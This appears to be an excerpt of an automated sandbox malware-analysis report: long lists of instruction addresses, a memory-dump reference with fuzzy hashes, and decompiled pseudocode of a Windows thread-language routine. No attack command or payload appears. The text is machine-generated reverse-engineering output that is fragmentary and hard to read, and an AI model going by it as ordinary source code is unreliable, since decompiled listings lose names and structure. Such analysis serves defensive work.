                                                      0x016825ac
                                                      0x016825ae
                                                      0x016825b1
                                                      0x016825b2
                                                      0x016825b5
                                                      0x016825b8
                                                      0x016825bb
                                                      0x016825bc
                                                      0x016825bf
                                                      0x016825c2
                                                      0x016825c5
                                                      0x016825c6
                                                      0x016825cb
                                                      0x016825ce
                                                      0x016825d8
                                                      0x016825dd
                                                      0x016825de
                                                      0x016825e1
                                                      0x016825e3
                                                      0x016825e9
                                                      0x016826da
                                                      0x016826da
                                                      0x016826dd
                                                      0x016826e2
                                                      0x016c5b56
                                                      0x00000000
                                                      0x016826e8
                                                      0x016826f9
                                                      0x016826fb
                                                      0x016826fe
                                                      0x01682700
                                                      0x016c5b60
                                                      0x00000000
                                                      0x01682706
                                                      0x01682706
                                                      0x0168270a
                                                      0x0168270a
                                                      0x0168270d
                                                      0x01682713
                                                      0x01682716
                                                      0x01682718
                                                      0x0168271c
                                                      0x0168271e
                                                      0x016c5b6c
                                                      0x016c5b6f
                                                      0x016c5b7f
                                                      0x016c5b89
                                                      0x016c5b8e
                                                      0x016c5b93
                                                      0x016c5b96
                                                      0x016c5b9c
                                                      0x016c5ba0
                                                      0x016c5ba3
                                                      0x016c5bab
                                                      0x016c5bb0
                                                      0x016c5bb3
                                                      0x016c5bb3
                                                      0x016c5ba3
                                                      0x01682724
                                                      0x01682726
                                                      0x01682729
                                                      0x0168272c
                                                      0x0168279d
                                                      0x0168279d
                                                      0x016827a0
                                                      0x016827a2
                                                      0x00000000
                                                      0x0168272e
                                                      0x0168272e
                                                      0x01682731
                                                      0x01682734
                                                      0x01682734
                                                      0x01682736
                                                      0x016c5bc1
                                                      0x016c5bc1
                                                      0x016c5bc4
                                                      0x00000000
                                                      0x016c5bca
                                                      0x016c5bca
                                                      0x016c5bcd
                                                      0x00000000
                                                      0x016c5bd3
                                                      0x00000000
                                                      0x016c5bd3
                                                      0x016c5bcd
                                                      0x0168273c
                                                      0x0168273c
                                                      0x01682742
                                                      0x01682747
                                                      0x0168274a
                                                      0x0168274d
                                                      0x01682750
                                                      0x00000000
                                                      0x01682756
                                                      0x01682756
                                                      0x00000000
                                                      0x01682902
                                                      0x01682908
                                                      0x0168290b
                                                      0x00000000
                                                      0x01682911
                                                      0x0168291c
                                                      0x01682921
                                                      0x00000000
                                                      0x01682921
                                                      0x00000000
                                                      0x00000000
                                                      0x01682880
                                                      0x01682887
                                                      0x0168288c
                                                      0x00000000
                                                      0x00000000
                                                      0x01682805
                                                      0x0168280a
                                                      0x01682814
                                                      0x01682816
                                                      0x00000000
                                                      0x00000000
                                                      0x0168281e
                                                      0x01682821
                                                      0x01682823
                                                      0x00000000
                                                      0x01682829
                                                      0x01682829
                                                      0x01682831
                                                      0x0168283c
                                                      0x0168283e
                                                      0x00000000
                                                      0x0168283e
                                                      0x00000000
                                                      0x00000000
                                                      0x0168284e
                                                      0x01682850
                                                      0x01682851
                                                      0x01682854
                                                      0x01682857
                                                      0x0168285a
                                                      0x0168285c
                                                      0x0168285d
                                                      0x00000000
                                                      0x00000000
                                                      0x0168275d
                                                      0x01682761
                                                      0x00000000
                                                      0x01682767
                                                      0x0168276e
                                                      0x01682773
                                                      0x01682773
                                                      0x01682776
                                                      0x01682778
                                                      0x0168277e
                                                      0x0168277e
                                                      0x01682781
                                                      0x01682781
                                                      0x01682783
                                                      0x01682784
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5bd8
                                                      0x016c5bde
                                                      0x016c5be4
                                                      0x016c5be6
                                                      0x016c5be8
                                                      0x016c5be9
                                                      0x016c5bee
                                                      0x016c5bf8
                                                      0x016c5bff
                                                      0x016c5c01
                                                      0x016c5c04
                                                      0x016c5c07
                                                      0x016c5c0b
                                                      0x016c5c0d
                                                      0x016c5c0d
                                                      0x016c5c15
                                                      0x016c5c18
                                                      0x016c5c1b
                                                      0x016c5c1b
                                                      0x016c5c1e
                                                      0x00000000
                                                      0x00000000
                                                      0x016828c3
                                                      0x016828c8
                                                      0x016828d2
                                                      0x016828d4
                                                      0x016828d8
                                                      0x016828db
                                                      0x016c5c26
                                                      0x016c5c28
                                                      0x016c5c2d
                                                      0x016c5c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5c34
                                                      0x016c5c36
                                                      0x016c5c49
                                                      0x016c5c4e
                                                      0x016c5c54
                                                      0x016c5c5b
                                                      0x016c5c5d
                                                      0x016c5c60
                                                      0x01682788
                                                      0x01682788
                                                      0x0168278b
                                                      0x0168278e
                                                      0x0168278e
                                                      0x0168278e
                                                      0x01682791
                                                      0x00000000
                                                      0x00000000
                                                      0x01682756
                                                      0x01682750
                                                      0x00000000
                                                      0x01682794
                                                      0x01682794
                                                      0x01682795
                                                      0x01682798
                                                      0x01682798
                                                      0x00000000
                                                      0x01682734
                                                      0x0168272c
                                                      0x01682700
                                                      0x016825ef
                                                      0x016825ef
                                                      0x016825ef
                                                      0x016825f2
                                                      0x016825f8
                                                      0x00000000
                                                      0x00000000
                                                      0x016825fe
                                                      0x00000000
                                                      0x016828e6
                                                      0x016828ec
                                                      0x016828ef
                                                      0x016828f5
                                                      0x016828f8
                                                      0x016828f8
                                                      0x00000000
                                                      0x016828f8
                                                      0x00000000
                                                      0x00000000
                                                      0x01682866
                                                      0x01682866
                                                      0x01682876
                                                      0x01682879
                                                      0x00000000
                                                      0x00000000
                                                      0x016827e0
                                                      0x016827e7
                                                      0x016827e9
                                                      0x016827eb
                                                      0x016c5afd
                                                      0x00000000
                                                      0x016c5afd
                                                      0x00000000
                                                      0x00000000
                                                      0x01682633
                                                      0x01682638
                                                      0x0168263b
                                                      0x0168263c
                                                      0x0168263e
                                                      0x01682640
                                                      0x01682642
                                                      0x01682647
                                                      0x01682649
                                                      0x0168264e
                                                      0x01682650
                                                      0x01682653
                                                      0x01682659
                                                      0x016826a2
                                                      0x016826a7
                                                      0x016826ac
                                                      0x016826b2
                                                      0x016c5b11
                                                      0x016c5b15
                                                      0x016c5b17
                                                      0x00000000
                                                      0x016826b8
                                                      0x016826b8
                                                      0x016826ba
                                                      0x016827a6
                                                      0x016827a6
                                                      0x016827a9
                                                      0x016827ab
                                                      0x016827b9
                                                      0x016827b9
                                                      0x016827be
                                                      0x016827c1
                                                      0x016827c3
                                                      0x016827c5
                                                      0x016827c7
                                                      0x016c5c74
                                                      0x016c5c79
                                                      0x016c5c79
                                                      0x016827c7
                                                      0x00000000
                                                      0x016826c0
                                                      0x016826c0
                                                      0x016826c3
                                                      0x016826c6
                                                      0x016826c6
                                                      0x016826c9
                                                      0x016826c9
                                                      0x00000000
                                                      0x016826c9
                                                      0x016826ba
                                                      0x0168265b
                                                      0x0168265b
                                                      0x0168265e
                                                      0x01682667
                                                      0x0168266d
                                                      0x01682677
                                                      0x0168267c
                                                      0x0168267f
                                                      0x01682681
                                                      0x016c5b49
                                                      0x016c5b4e
                                                      0x016827cd
                                                      0x016827d0
                                                      0x016827d1
                                                      0x016827d2
                                                      0x016827d4
                                                      0x016827dd
                                                      0x01682687
                                                      0x01682687
                                                      0x0168268a
                                                      0x0168268b
                                                      0x0168268e
                                                      0x0168268f
                                                      0x01682691
                                                      0x01682696
                                                      0x01682698
                                                      0x0168269d
                                                      0x0168269f
                                                      0x00000000
                                                      0x0168269f
                                                      0x01682681
                                                      0x00000000
                                                      0x00000000
                                                      0x01682846
                                                      0x00000000
                                                      0x00000000
                                                      0x01682605
                                                      0x0168260a
                                                      0x0168260c
                                                      0x01682611
                                                      0x01682616
                                                      0x01682619
                                                      0x01682619
                                                      0x0168261e
                                                      0x00000000
                                                      0x01682624
                                                      0x01682627
                                                      0x01682627
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x01682894
                                                      0x0168289b
                                                      0x0168289d
                                                      0x016828a1
                                                      0x016c5b2b
                                                      0x016c5b2e
                                                      0x016c5b2e
                                                      0x016828a7
                                                      0x016828a9
                                                      0x016c5b04
                                                      0x016c5b09
                                                      0x016c5b09
                                                      0x016c5b09
                                                      0x00000000
                                                      0x00000000
                                                      0x016c5b35
                                                      0x016c5b3c
                                                      0x016828fb
                                                      0x016828fb
                                                      0x016826cc
                                                      0x016826cc
                                                      0x016826d0
                                                      0x00000000
                                                      0x016826d2
                                                      0x016826d2
                                                      0x00000000
                                                      0x016826d2
                                                      0x00000000
                                                      0x00000000
                                                      0x016825fe
                                                      0x0168292d
                                                      0x0168292f
                                                      0x01682930
                                                      0x01682935
                                                      0x01682937
                                                      0x0168293c
                                                      0x0168293e
                                                      0x0168293f
                                                      0x01682944
                                                      0x0168294c
                                                      0x0168294e
                                                      0x0168294f
                                                      0x01682950
                                                      0x01682957
                                                      0x01682958
                                                      0x0168295a
                                                      0x0168295d
                                                      0x01682960
                                                      0x01682962
                                                      0x01682963
                                                      0x01682968
                                                      0x01682972
                                                      0x01682973
                                                      0x01682974
                                                      0x0168297b
                                                      0x0168297c
                                                      0x0168297e
                                                      0x0168297f
                                                      0x01682980
                                                      0x01682981
                                                      0x01682982
                                                      0x01682983
                                                      0x01682984
                                                      0x01682985
                                                      0x01682986
                                                      0x01682987
                                                      0x01682988
                                                      0x01682989
                                                      0x0168298a
                                                      0x0168298b
                                                      0x0168298c
                                                      0x0168298d
                                                      0x0168298e
                                                      0x0168298f
                                                      0x01682990
                                                      0x01682992
                                                      0x01682997
                                                      0x016829a3
                                                      0x016829a6
                                                      0x016829ab
                                                      0x016829ad
                                                      0x016829b0
                                                      0x016829b2
                                                      0x016c5c80
                                                      0x016829b8
                                                      0x016829b8
                                                      0x016829bb
                                                      0x016829c0
                                                      0x016829c5
                                                      0x016829c6
                                                      0x016829c6
                                                      0x016829c9
                                                      0x016829cb
                                                      0x00000000
                                                      0x00000000
                                                      0x016829cd
                                                      0x016829d0
                                                      0x016829d9
                                                      0x016829db
                                                      0x016829dd
                                                      0x01682a7f
                                                      0x01682a84
                                                      0x01682a87
                                                      0x01682a89
                                                      0x016c5ca1
                                                      0x016c5ca3
                                                      0x00000000
                                                      0x01682a8f
                                                      0x01682a8f
                                                      0x00000000
                                                      0x01682a8f
                                                      0x00000000
                                                      0x016829e3
                                                      0x016829e3
                                                      0x016829e3
                                                      0x00000000
                                                      0x016829e3
                                                      0x016829dd
                                                      0x00000000
                                                      0x016829db
                                                      0x016829e6
                                                      0x016829e9
                                                      0x016829eb
                                                      0x016829ed
                                                      0x016829f3
                                                      0x016829f5
                                                      0x016829f8
                                                      0x016829fa
                                                      0x01682a97
                                                      0x01682a9a
                                                      0x01682a9d
                                                      0x01682add
                                                      0x00000000
                                                      0x01682a9f
                                                      0x01682aa2
                                                      0x01682aa5
                                                      0x01682aa8
                                                      0x01682aab
                                                      0x016c5cab
                                                      0x016c5caf
                                                      0x016c5cc5
                                                      0x016c5cda
                                                      0x016c5cdc
                                                      0x016c5cdf
                                                      0x016c5ce5
                                                      0x00000000
                                                      0x016c5ceb
                                                      0x016c5ced
                                                      0x016c5cee
                                                      0x00000000
                                                      0x016c5cee
                                                      0x016c5cb1
                                                      0x016c5cb4
                                                      0x016c5cb9
                                                      0x016c5cbb
                                                      0x00000000
                                                      0x016c5cbd
                                                      0x016c5cbd
                                                      0x00000000
                                                      0x016c5cbd
                                                      0x016c5cbb
                                                      0x01682ab1
                                                      0x01682ab1
                                                      0x01682ac4
                                                      0x01682ac6
                                                      0x01682ac6
                                                      0x00000000
                                                      0x01682ac6
                                                      0x01682aab
                                                      0x00000000
                                                      0x01682a00
                                                      0x01682a09
                                                      0x01682a0e
                                                      0x01682a21
                                                      0x01682a24
                                                      0x01682a35
                                                      0x01682a3a
                                                      0x01682a3d
                                                      0x01682a42
                                                      0x01682a59
                                                      0x01682a59
                                                      0x01682a5c
                                                      0x01682a5f
                                                      0x01682a5f
                                                      0x016829fa
                                                      0x016829f3
                                                      0x01682a64
                                                      0x01682a64
                                                      0x01682a6b
                                                      0x01682a6b
                                                      0x01682a6d
                                                      0x01682a72
                                                      0x01682a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: 829c930186408190d1dfdb75df93984114374e0b961edf6f81cdd9788e2e0c0e
                                                      • Instruction ID: ff76455f785d52e512a8e4e335e687860cd3fdab69c40bee5f04994b7fe31403
                                                      • Opcode Fuzzy Hash: 829c930186408190d1dfdb75df93984114374e0b961edf6f81cdd9788e2e0c0e
                                                      • Instruction Fuzzy Hash: FFC19EB5E00219EBDB25EF99DCA0ABDBBB5FF48710F44412DE901AB350D734A942CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E0168FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0166EEF0(0x1747b60);
					_t134 =  *0x1747b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1747b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1747b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01666D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E016676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E016F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0165B150();
													}
													_t116 = E016F6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E016675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1748638; // 0x0
																	_t122 = L016638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E016676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E016676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0168FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L016670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0168FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0168FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0168FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0168FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0168FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1747b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1747b84 = _t75;
						_t73 = E0166EB70(_t134, 0x1747b60);
						if( *0x1747b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0166FF60( *0x1747b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                      0x0168fab0
                                                      0x0168fab2
                                                      0x0168fab3
                                                      0x0168fab4
                                                      0x0168fabc
                                                      0x0168fac0
                                                      0x0168fb14
                                                      0x0168fb17
                                                      0x0168fac2
                                                      0x0168fac8
                                                      0x0168facd
                                                      0x0168fad3
                                                      0x0168fad3
                                                      0x0168fadd
                                                      0x0168fb18
                                                      0x0168fb1b
                                                      0x0168fb1d
                                                      0x0168fb1e
                                                      0x0168fb1f
                                                      0x0168fb20
                                                      0x0168fb21
                                                      0x0168fb22
                                                      0x0168fb23
                                                      0x0168fb24
                                                      0x0168fb25
                                                      0x0168fb26
                                                      0x0168fb27
                                                      0x0168fb28
                                                      0x0168fb29
                                                      0x0168fb2a
                                                      0x0168fb2b
                                                      0x0168fb2c
                                                      0x0168fb2d
                                                      0x0168fb2e
                                                      0x0168fb2f
                                                      0x0168fb3a
                                                      0x0168fb3b
                                                      0x0168fb3e
                                                      0x0168fb41
                                                      0x0168fb44
                                                      0x0168fb47
                                                      0x0168fb4a
                                                      0x0168fb4d
                                                      0x0168fb53
                                                      0x016cbdcb
                                                      0x016cbdcb
                                                      0x0168fb59
                                                      0x0168fb5b
                                                      0x0168fb5b
                                                      0x0168fb5e
                                                      0x016cbdd5
                                                      0x016cbdd8
                                                      0x00000000
                                                      0x016cbdda
                                                      0x00000000
                                                      0x016cbdda
                                                      0x0168fb64
                                                      0x0168fb64
                                                      0x0168fb64
                                                      0x0168fb67
                                                      0x0168fb6e
                                                      0x0168fb70
                                                      0x0168fb72
                                                      0x00000000
                                                      0x0168fb78
                                                      0x0168fb7a
                                                      0x0168fb7a
                                                      0x0168fb7d
                                                      0x0168fb80
                                                      0x016cbddf
                                                      0x016cbde1
                                                      0x00000000
                                                      0x016cbde3
                                                      0x00000000
                                                      0x016cbde3
                                                      0x0168fb86
                                                      0x0168fb86
                                                      0x0168fb86
                                                      0x0168fb8b
                                                      0x0168fb90
                                                      0x0168fb92
                                                      0x0168fb94
                                                      0x0168fb9a
                                                      0x0168fb9b
                                                      0x0168fba1
                                                      0x016cbde8
                                                      0x016cbdeb
                                                      0x016cbded
                                                      0x016cbeb5
                                                      0x016cbeb5
                                                      0x016cbebb
                                                      0x016cbebd
                                                      0x016cbec3
                                                      0x016cbed2
                                                      0x016cbedd
                                                      0x016cbedd
                                                      0x016cbeed
                                                      0x00000000
                                                      0x016cbdf3
                                                      0x016cbdfe
                                                      0x016cbe06
                                                      0x016cbe0b
                                                      0x016cbe0d
                                                      0x016cbe0f
                                                      0x016cbe14
                                                      0x016cbe19
                                                      0x016cbe20
                                                      0x016cbe25
                                                      0x016cbe27
                                                      0x016cbe35
                                                      0x016cbe39
                                                      0x016cbe46
                                                      0x016cbe4f
                                                      0x016cbe54
                                                      0x016cbe56
                                                      0x016cbef8
                                                      0x016cbef8
                                                      0x00000000
                                                      0x016cbe5c
                                                      0x016cbe5c
                                                      0x016cbe60
                                                      0x00000000
                                                      0x016cbe66
                                                      0x016cbe66
                                                      0x016cbe7f
                                                      0x016cbe84
                                                      0x016cbe87
                                                      0x016cbe89
                                                      0x016cbe8b
                                                      0x016cbe99
                                                      0x016cbe9d
                                                      0x016cbea0
                                                      0x016cbeac
                                                      0x016cbeaf
                                                      0x016cbeb1
                                                      0x016cbeb3
                                                      0x016cbeb3
                                                      0x00000000
                                                      0x016cbea2
                                                      0x016cbea2
                                                      0x00000000
                                                      0x016cbea2
                                                      0x016cbe8d
                                                      0x016cbe8d
                                                      0x016cbe92
                                                      0x00000000
                                                      0x016cbe92
                                                      0x016cbe8b
                                                      0x016cbe60
                                                      0x016cbe3b
                                                      0x016cbe3b
                                                      0x016cbe3e
                                                      0x00000000
                                                      0x016cbe40
                                                      0x016cbe40
                                                      0x016cbe44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016cbe44
                                                      0x016cbe3e
                                                      0x016cbe29
                                                      0x016cbe29
                                                      0x00000000
                                                      0x016cbe29
                                                      0x016cbe27
                                                      0x00000000
                                                      0x0168fba7
                                                      0x0168fba7
                                                      0x0168fbab
                                                      0x016cbf02
                                                      0x0168fbb1
                                                      0x0168fbb1
                                                      0x0168fbb8
                                                      0x0168fbbd
                                                      0x0168fbbd
                                                      0x0168fbbf
                                                      0x0168fbbf
                                                      0x0168fbc5
                                                      0x0168fbcb
                                                      0x0168fbf8
                                                      0x0168fbf8
                                                      0x0168fbfa
                                                      0x00000000
                                                      0x0168fc00
                                                      0x0168fc00
                                                      0x0168fc03
                                                      0x00000000
                                                      0x0168fc09
                                                      0x0168fc09
                                                      0x0168fc0f
                                                      0x0168fc15
                                                      0x0168fc23
                                                      0x0168fc23
                                                      0x0168fc25
                                                      0x0168fc27
                                                      0x0168fc75
                                                      0x0168fc7c
                                                      0x0168fc84
                                                      0x00000000
                                                      0x0168fc29
                                                      0x0168fc29
                                                      0x0168fc2d
                                                      0x0168fc30
                                                      0x016cbf0f
                                                      0x00000000
                                                      0x0168fc36
                                                      0x0168fc38
                                                      0x0168fc3b
                                                      0x0168fc41
                                                      0x016cbf17
                                                      0x016cbf19
                                                      0x016cbf48
                                                      0x016cbf4b
                                                      0x00000000
                                                      0x016cbf1b
                                                      0x016cbf22
                                                      0x016cbf24
                                                      0x016cbf26
                                                      0x00000000
                                                      0x016cbf2c
                                                      0x016cbf37
                                                      0x016cbf39
                                                      0x016cbf3b
                                                      0x00000000
                                                      0x016cbf41
                                                      0x016cbf41
                                                      0x016cbf41
                                                      0x016cbf41
                                                      0x016cbf45
                                                      0x00000000
                                                      0x016cbf45
                                                      0x016cbf3b
                                                      0x016cbf26
                                                      0x00000000
                                                      0x0168fc47
                                                      0x0168fc47
                                                      0x0168fc49
                                                      0x0168fcb2
                                                      0x0168fcb4
                                                      0x0168fcb6
                                                      0x0168fcdc
                                                      0x0168fcdc
                                                      0x00000000
                                                      0x0168fcb8
                                                      0x0168fcc3
                                                      0x0168fcc5
                                                      0x0168fcc7
                                                      0x00000000
                                                      0x0168fcc9
                                                      0x0168fcc9
                                                      0x0168fccd
                                                      0x00000000
                                                      0x0168fccd
                                                      0x0168fcc7
                                                      0x00000000
                                                      0x0168fc4b
                                                      0x0168fc4b
                                                      0x0168fc4e
                                                      0x0168fc4e
                                                      0x0168fc51
                                                      0x0168fc51
                                                      0x0168fc54
                                                      0x0168fc5a
                                                      0x0168fc5c
                                                      0x0168fc5f
                                                      0x0168fc61
                                                      0x0168fc63
                                                      0x0168fc65
                                                      0x0168fc67
                                                      0x0168fc6e
                                                      0x0168fc72
                                                      0x0168fc72
                                                      0x0168fc72
                                                      0x0168fc72
                                                      0x0168fc67
                                                      0x0168fc61
                                                      0x00000000
                                                      0x0168fc5a
                                                      0x0168fc49
                                                      0x0168fc41
                                                      0x0168fc30
                                                      0x0168fc27
                                                      0x0168fc03
                                                      0x0168fbcd
                                                      0x0168fbd3
                                                      0x0168fbd9
                                                      0x0168fbdc
                                                      0x0168fbde
                                                      0x0168fc99
                                                      0x0168fc9b
                                                      0x0168fc9d
                                                      0x0168fcd5
                                                      0x0168fcd5
                                                      0x0168fc89
                                                      0x0168fc89
                                                      0x00000000
                                                      0x0168fc9f
                                                      0x0168fc9f
                                                      0x0168fca3
                                                      0x00000000
                                                      0x0168fca3
                                                      0x00000000
                                                      0x0168fbe4
                                                      0x0168fbe4
                                                      0x0168fbe4
                                                      0x0168fbe4
                                                      0x0168fbe9
                                                      0x0168fbf2
                                                      0x00000000
                                                      0x0168fbf2
                                                      0x0168fbde
                                                      0x0168fbcb
                                                      0x0168fbab
                                                      0x0168fc8b
                                                      0x0168fc8b
